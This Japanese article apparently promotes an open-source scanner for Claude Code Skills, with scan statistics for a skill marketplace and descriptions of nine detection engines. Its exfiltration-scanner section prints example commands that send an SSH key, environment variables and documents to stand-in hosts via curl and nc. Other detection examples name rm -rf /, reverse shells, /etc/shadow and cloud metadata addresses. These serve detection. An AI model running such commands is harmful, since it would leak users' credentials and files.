Claude Skill Antivirus:Claude Code ワークフローを守る
Claude Code Skills 向けのセキュリティスキャナー。サードパーティ Skills をインストールする前に悪意あるパターンを検出。SkillsMP の 71,577 Skills をスキャンした結果をご覧ください。
サードパーティの Skills は Claude Code の機能を拡張しますが、それが安全かどうかをどう判断しますか?
私たちはこの問いに答えるため claude-skill-antivirus を開発しました。9 つの専用セキュリティエンジンを使用して、インストール前に Skills の悪意あるパターンをスキャンします。
そして SkillsMP 上の全 71,577 Skills をスキャンしました。結果をご覧ください。
問題:Skill のセキュリティ
Claude Code の Skills は以下のことができます:
- bash コマンドを実行
- ファイルの読み書き
- ネットワークリクエストの送信
- 環境変数へのアクセス
- サブエージェントの起動
悪意のある Skill は以下のことが可能です:
- SSH キーと認証情報の窃取
- 外部サーバーへのコード流出
- バックドアのインストール
- クラウドメタデータ(AWS、GCP、Azure)へのアクセス
- サブエージェントを通じた連鎖攻撃
Claude Code エコシステムにはセキュリティ層が必要です。
SkillsMP スキャン結果
SkillsMP プラットフォーム上の全 71,577 Skills をスキャンしました:
| リスクレベル | 数 | 割合 |
|---|---|---|
| 重大 (CRITICAL) | 91 | 0.13% |
| 高 (HIGH) | 626 | 0.87% |
| 中 (MEDIUM) | 1,310 | 1.83% |
| 安全 (SAFE) | 69,505 | 97.11% |
主な発見:約 3% の Skills に潜在的リスクがある可能性があります。
重大リスクの内訳
| カテゴリ | 数 | 説明 |
|---|---|---|
| パスワードマネージャーアクセス | 41 | 1Password、Bitwarden、Dashlane へのアクセス試行 |
| ネットワーク + メタデータアクセス | 31 | ネットワークツールとメタデータアクセスの組み合わせ |
| ブラウザ認証情報 | 7 | ブラウザのパスワード/クッキーへのアクセス |
| スケジュール流出 | 7 | cron ベースのデータ流出パターン |
| タイポスクワッティング | 2 | 疑わしいパッケージ名(フィッシング) |
誤検知の考慮
一部の検出結果は正当なものかもしれません:
- パスワードマネージャー skills(1password、bitwarden)は公式統合ツールの可能性
- ブラウザ自動化 skills は正当にブラウザアクセスが必要な場合あり
- API 統合 skills はネットワーク警告をトリガーする可能性あり
判断前に必ずフラグ付きの Skills を手動で確認してください。
9 つのセキュリティスキャンエンジン
1. 危険なコマンドスキャナー
破壊的なシェルコマンドを検出:
| リスク | 例 |
|---|---|
| 重大 | rm -rf /、`curl |
| 高 | /etc/shadow アクセス、reverse shell |
| 中 | rm -rf、権限変更 |
2. データ流出スキャナー
「ローカル読み取り - リモート送信」パターンを検出:
cat ~/.ssh/id_rsa | base64 | curl -d @- https://evil.com
env | curl -X POST https://collector.io
tar czf - ~/Documents | nc attacker.com 80803. 権限スキャナー
allowed-tools 宣言を分析:
- 重大:
Bash(*)- 無制限のシェルアクセス - 高:
Write、WebFetchの組み合わせ - 危険な組み合わせ:
Read + WebFetch= 流出リスク
4. 外部接続スキャナー
疑わしい URL を識別:
- IP 直接接続 URL
- Webhook/データキャプチャサービス
- 疑わしい TLD(.tk、.ml)
- Discord/Telegram webhook
5. パターンスキャナー
検出対象:
- プロンプトインジェクション攻撃
- ハードコードされた認証情報
- 難読化されたコード(base64、hex)
- ソーシャルエンジニアリング言語
6. MCP セキュリティスキャナー
MCP サーバー設定を検証:
- 信頼できないソース
- 危険な権限(filesystem + network)
- 露出した認証情報
7. SSRF スキャナー
Server-Side Request Forgery を検出:
| ターゲット | 例 |
|---|---|
| クラウドメタデータ | 169.254.169.254、IMDSv2 バイパス |
| 内部ネットワーク | 10.x.x.x、192.168.x.x 探索 |
| Kubernetes | サービスアカウントシークレット、API アクセス |
| Docker | docker.sock アクセス、コンテナエスケープ |
8. 依存関係スキャナー
悪意のあるパッケージを検出:
- 既知の悪意あるもの:event-stream、colors、faker
- タイポスクワッティング:crossenv、lodash-、mongose
- 疑わしいインストールスクリプト
9. サブエージェントスキャナー
Task ツールの悪用を検出:
- 権限昇格(Bash agent の起動)
- エージェントチェーン攻撃(ネストされた Task 呼び出し)
- DoS 攻撃(無限再帰)
使用方法
グローバルインストール
npm install -g claude-skill-antivirusインストール前にスキャン
# スキャンのみ(推奨の最初のステップ)
skill-install ./path/to/skill --scan-only
# プロジェクトレベルにインストール(デフォルト)
skill-install https://github.com/user/skill-repo
# ユーザーレベルにインストール
skill-install @skillsmp/example-skill --global出力例
安全な Skill:
===========================================
セキュリティスキャンレポート
===========================================
リスクレベル: ✅ 安全
📊 発見サマリー:
🟢 重大: 0
🟢 高: 0
🟢 中: 0
🟢 低: 0
ℹ️ 情報: 2
✅ 推奨: 安全にインストールできます悪意のある Skill を検出:
===========================================
セキュリティスキャンレポート
===========================================
リスクレベル: ☠️ 重大
📊 発見サマリー:
🔴 重大: 5
🟠 高: 3
🟡 中: 2
🔴 重大な発見:
• [データ収集] 機密認証ファイルの読み取り
• [データ流出] curl によるコマンド出力の送信
...
❌ 推奨: インストールしないでくださいプログラマティック API
独自のツールでスキャナーを使用:
import { SecurityScanner, loadSkill } from 'claude-skill-antivirus';
const scanner = new SecurityScanner();
const skill = await loadSkill('./path/to/skill');
const findings = await scanner.scan(skill);
if (findings.critical.length > 0) {
console.error('Skill に重大なセキュリティリスクが含まれています!');
process.exit(1);
}CI/CD との統合
パイプラインに Skill スキャンを追加:
# .github/workflows/skill-check.yml
- name: Skills をスキャン
run: |
npx claude-skill-antivirus ./.claude/skills/* --scan-only
if [ $? -ne 0 ]; then
echo "セキュリティスキャンに失敗しました!"
exit 1
fi推奨事項
ユーザー向け
- インストール前に必ずスキャン:
skill-install <source> --scan-only - 判断前にフラグ付きの Skills を手動で確認
- グローバルよりプロジェクトレベルのインストールを優先
- 可能な限り公式/検証済みの Skills を使用
Skill 作者向け
- 権限を最小化 - 必要なものだけをリクエスト
- パスワードマネージャーやブラウザ認証情報にアクセスするパターンを避ける
- 外部接続を明確に文書化
- 難読化されたコードを使用しない
プラットフォーム向け
- 提出された Skills の自動スキャン
- Skill マーケットプレイスでの明確なリスクラベリング
- レビュー済み Skills への検証バッジ
オープンソース
claude-skill-antivirus は MIT ライセンスのオープンソースプロジェクトです。
- GitHub:github.com/claude-world/claude-skill-antivirus
- npm:
npm install -g claude-skill-antivirus - 完全スキャンレポート:SCAN-REPORT.md
コントリビューション
貢献を歓迎します:
- 新しい検出パターン
- 誤検知の改善
- 追加のスキャンエンジン
- 言語サポート
セキュリティはみんなの責任です。インストール前にスキャンしましょう。